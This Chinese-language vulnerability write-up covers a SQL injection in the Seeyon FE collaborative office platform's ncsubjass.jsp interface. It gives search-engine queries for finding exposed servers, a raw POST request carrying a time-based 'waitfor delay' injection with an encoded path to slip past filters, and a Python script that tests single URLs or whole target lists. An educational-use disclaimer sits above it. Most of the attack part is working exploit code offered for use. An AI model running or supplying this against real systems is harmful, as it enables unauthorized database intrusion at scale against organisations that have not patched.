【漏洞复现】致远互联FE协作办公平台——SQL注入

声明：本文档或演示材料仅供教育和教学目的使用，任何个人或组织使用本文档中的信息进行非法活动，均与本文档的作者或发布者无关。

---

漏洞描述

致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。其ncsubjass.jsp接口处存在SQL注入漏洞,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句。

漏洞复现

1）信息收集
fofa：body="li_plugins_download"
hunter：web.body="li_plugins_download"

哲学家们只是用不同的方式解释世界，而问题在于改变世界。

2）构造数据包

POST /fenc/ncsubjass.j%73p HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

subjcode=-1';waitfor delay '0:0:5'--

响应包延迟了5秒，验证存在sql注入。

测试工具

poc

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import http.client  # 导入处理HTTP请求的模块
import ssl          # 导入SSL支持模块
import argparse     # 导入命令行参数解析模块
from urllib.parse import urlparse  # 导入URL解析模块
import time         # 导入时间处理模块

# 定义控制台输出颜色代码
RED = '\033[91m'   # 红色
RESET = '\033[0m'  # 重置颜色

def check_vulnerability(url):
    """
    检查给定URL是否存在特定的SQL注入漏洞。
    """
    try:
        # 解析URL，获取域名和协议
        parsed_url = urlparse(url)
        
        # 设置请求的路径和数据体
        path = "/fenc/ncsubjass.j%73p"  # 要请求的路径，其中j%73p为编码后的".js"
        
        # 构造POST请求的数据体，包含潜在的SQL注入payload
        body = "subjcode=-1';waitfor delay '0:0:3'--"
        headers = {
            "Content-Type": "application/x-www-form-urlencoded",  # 设置Content-Type头
            "User-Agent": "Mozilla/5.0"  # 设置User-Agent头
        }
        
        # 根据URL的协议创建连接对象，如果是HTTPS则忽略证书验证
        conn = http.client.HTTPSConnection(parsed_url.netloc, context=ssl._create_unverified_context()) if parsed_url.scheme == "https" else http.client.HTTPConnection(parsed_url.netloc)
        
        # 记录开始时间
        start_time = time.time()
        
        # 发送POST请求
        conn.request("POST", path, body=body, headers=headers)
        
        # 获取服务器响应
        response = conn.getresponse()
        
        # 计算请求耗时
        elapsed_time = time.time() - start_time
        
        # 如果响应时间在3到5秒之间，可能表明存在SQL注入漏洞（因为waitfor delay '0:0:3'会延迟响应）
        if 3 <= elapsed_time <= 5:
            print(f"{RED}URL [{url}] 可能存在致远互联FE协作办公平台 ncsubjass SQL注入漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    except Exception as e:
        # 如果请求失败，打印错误信息
        print(f"URL [{url}] 请求失败: {e}")

def main():
    """
    主函数，解析命令行参数并调用漏洞检查函数。
    """
    # 创建命令行参数解析器
    parser = argparse.ArgumentParser(description='检测目标地址是否存在致远互联FE协作办公平台 ncsubjass SQL注入漏洞')
    
    # 添加命令行参数选项
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')
    
    # 解析命令行参数
    args = parser.parse_args()
    
    # 如果指定了单个URL，进行漏洞检查
    if args.url:
        # 确保URL格式正确
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    
    # 如果指定了包含多个URL的文件，逐个读取并进行漏洞检查
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()  # 读取所有行并去除换行符
            for url in urls:
                # 确保URL格式正确
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

# 当作为主程序运行时，调用main函数
if __name__ == '__main__':
    main()

运行截图